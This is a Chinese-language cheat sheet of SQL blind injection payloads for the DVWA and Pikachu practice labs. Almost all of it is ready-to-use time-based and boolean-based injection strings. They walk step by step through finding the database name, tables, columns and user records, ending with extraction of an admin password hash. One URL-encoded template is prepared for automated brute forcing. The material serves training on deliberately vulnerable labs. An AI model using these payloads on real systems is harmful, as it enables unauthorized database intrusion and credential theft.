dvwa和pikachu靶场盲注语句

SQL盲注流程
判断是否存在注入点 字符型_exp(1' and 1=1#   1' and 1=2#)  数字型不用闭合单双引号
猜测数据库名字符串长度  exp（1' and length(database())=1#）
猜测数据库名称
猜测数据表个数
猜测数据表名长度
获取数据表名称
猜测数据表字段个数
猜测数据表字段名长度
获取数据表字段值
获取数据

时间盲注（DVWA）

1:获取数据库名字符串长度
1' and if(length(database())=4,sleep(5),1)#

1.1:获取数据库名
1' and if(ascii(substr(database(),1,1))=100,sleep(5),1)#  获取数据库名中第1个字符   d
1' and if(ascii(substr(database(),2,1))=118,sleep(5),1)#  获取数据库名中第2个字符   v
1' and if(ascii(substr(database(),3,1))=119,sleep(5),1)#  获取数据库名中第3个字符   w
1' and if(ascii(substr(database(),4,1))=97,sleep(5),1)#   获取数据库名中第4个字符   a
1' and if(((select database())='dvwa'),sleep(5),1)#       确认数据库名为dvwa

2:获取数据表名个数
1' and if((select count(table_name) from information_schema.TABLES WHERE TABLE_SCHEMA='dvwa') = 2,sleep(5),1)# 2个数据表

3：获取第一个数据表（guestbook）名字符串长度
1' and if(length((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1))=9,sleep(5),1)#

3.1获取第一个数据表名的第一个字符
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1,1))=103,sleep(5),1)#    g
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),2,1))=117,sleep(5),1)#    u

获取第二张数据表（users）名字符串长度
1' and if(length((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1))=5,sleep(5),1)#
3.2获取第二个数据表名（users）字符串长度
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),1,1))=117,sleep(5),1)#    u
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),2,1))=115,sleep(5),1)#    s
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),3,1))=101,sleep(5),1)#    e
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),4,1))=114,sleep(5),1)#    r
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),5,1))=115,sleep(5),1)#    s

3.3获取users表中字段个数为8
1' and if((select count(*) from information_schema.columns where table_schema='dvwa' and table_name = 'users') =8,sleep(5),1)#   
获取users表中第一个字段名称(user_id)
1' and if(ascii(substr((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1),1,1))=117,sleep(5),1)#    u
1' and if(ascii(substr((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1),2,1))=115,sleep(5),1)#    s
获取users表中第四个字段名称（user）
1' and if(ascii(substr((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 3,1),1,1))=117,sleep(5),1)#    u

布尔盲注（pikachu）

1：获取数据库名长度
admin' and length(database())=7 #
 
1.1：获取数据库的名称
admin' and ascii(substr(database(),1,1))=112#              p
admin' and ascii(substr(database(),2,1))=105#              i
admin' and ascii(substr(database(),3,1))=107#               k
admin' and ascii(substr(database(),4,1))=97 #               a
admin' and ascii(substr(database(),5,1))=99 #               c
admin' and ascii(substr(database(),6,1))=104 #               h
admin' and ascii(substr(database(),7,1))=117 #               u

2获取pikachu数据库数据表个数
admin' and (select count(table_name) from information_schema.tables where table_schema='pikachu')=5#

2.1获取pikachu数据库第一个数据表名长度（httpinfo）
admin' and ((select length(table_name) from information_schema.tables where table_schema='pikachu' limit 0,1)=8)#
2.2获取pikachu数据库第二个数据表名长度（member）
admin' and ((select length(table_name) from information_schema.tables where table_schema='pikachu' limit 1,1)=6)#
2.3获取pikachu数据库第三个数据表名长度（message）
admin' and ((select length(table_name) from information_schema.tables where table_schema='pikachu' limit 2,1)=7)#
2.4获取pikachu数据库第四个数据表名长度（users）
admin' and ((select length(table_name) from information_schema.tables where table_schema='pikachu' limit 3,1)=5)#
2.5获取pikachu数据库第五个数据表名长度（xssblind）
admin' and ((select length(table_name) from information_schema.tables where table_schema='pikachu' limit 4,1)=8)#

2.2获取pikachu数据库第一张数据表名称(httpinfo）
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),1,1))=104#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),2,1))=116#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),3,1))=116#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),4,1))=112#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),5,1))=105#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),6,1))=110#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),7,1))=102#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),8,1))=111#

2.3获取pikachu数据库第四张数据表名称（users）
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 3,1),1,1))=117#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 3,1),2,1))=115#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 3,1),3,1))=101#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 3,1),4,1))=114#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 3,1),5,1))=115#

3：获取httpinfo表中字段个数
admin' and ((select count(column_name) from information_schema.columns where table_schema='pikachu' and table_name='httpinfo')=6)#
3.1：获取users表中字段个数
admin' and ((select count(column_name) from information_schema.columns where table_schema='pikachu' and table_name='users')=4)#

3.2:获取users表第一个字段名称长度（id）
admin' and ((select length(column_name) from information_schema.columns where table_schema='pikachu' and table_name='users' limit 0,1)=2)#
获取users表第二个字段名称长度（username）
admin' and ((select length(column_name) from information_schema.columns where table_schema='pikachu' and table_name='users' limit 1,1)=8)#
获取users表第三个字段名称长度（password）
admin' and ((select length(column_name) from information_schema.columns where table_schema='pikachu' and table_name='users' limit 2,1)=8)#
获取users表第四个字段名称长度（level）
admin' and ((select length(column_name) from information_schema.columns where table_schema='pikachu' and table_name='users' limit 3,1)=5)#

3.3获取pikachu数据库第一个字段名称（id）
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 0,1),1,1))=105#
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 0,1),2,1))=100#

3.4获取pikachu数据库第二个字段名称（username）
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 1,1),1,1))=117#
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 1,1),2,1))=115#
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 1,1),3,1))=101#
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 1,1),4,1))=114#
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 1,1),5,1))=110#
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 1,1),6,1))=97#
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 1,1),7,1))=109#
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 1,1),8,1))=101#

3.4获取pikachu数据库第三个字段名称（password）
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 2,1),1,1))=112#
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 2,1),2,1))=97#

3.5获取users表第一个字段名称内容（1，2，3）
admin' and ascii(substr((select id from users limit 0,1),1,1))=49#
admin' and ascii(substr((select id from users limit 1,1),1,1))=50#
admin' and ascii(substr((select id from users limit 2,1),1,1))=51#

3.6获取users表第二个字段名称内容（admin）
admin' and ascii(substr((select username from users limit 0,1),1,1))=97#
admin' and ascii(substr((select username from users limit 0,1),2,1))=100#
admin' and ascii(substr((select username from users limit 0,1),3,1))=109#
admin' and ascii(substr((select username from users limit 0,1),4,1))=105#
admin' and ascii(substr((select username from users limit 0,1),5,1))=110#

3.7获取users表第三个字段名称内容（e10adc3949ba59abbe56e057f20f883e）
admin' and ascii(substr((select password from users limit 0,1),1,1))=101#
%27+and+ascii%28substr%28%28select+password+from+users+limit+0%2C1%29%2C{}%2C1%29%29%3D101%23
admin' and ascii(substr((select password from users limit 0,1),2,1))=49#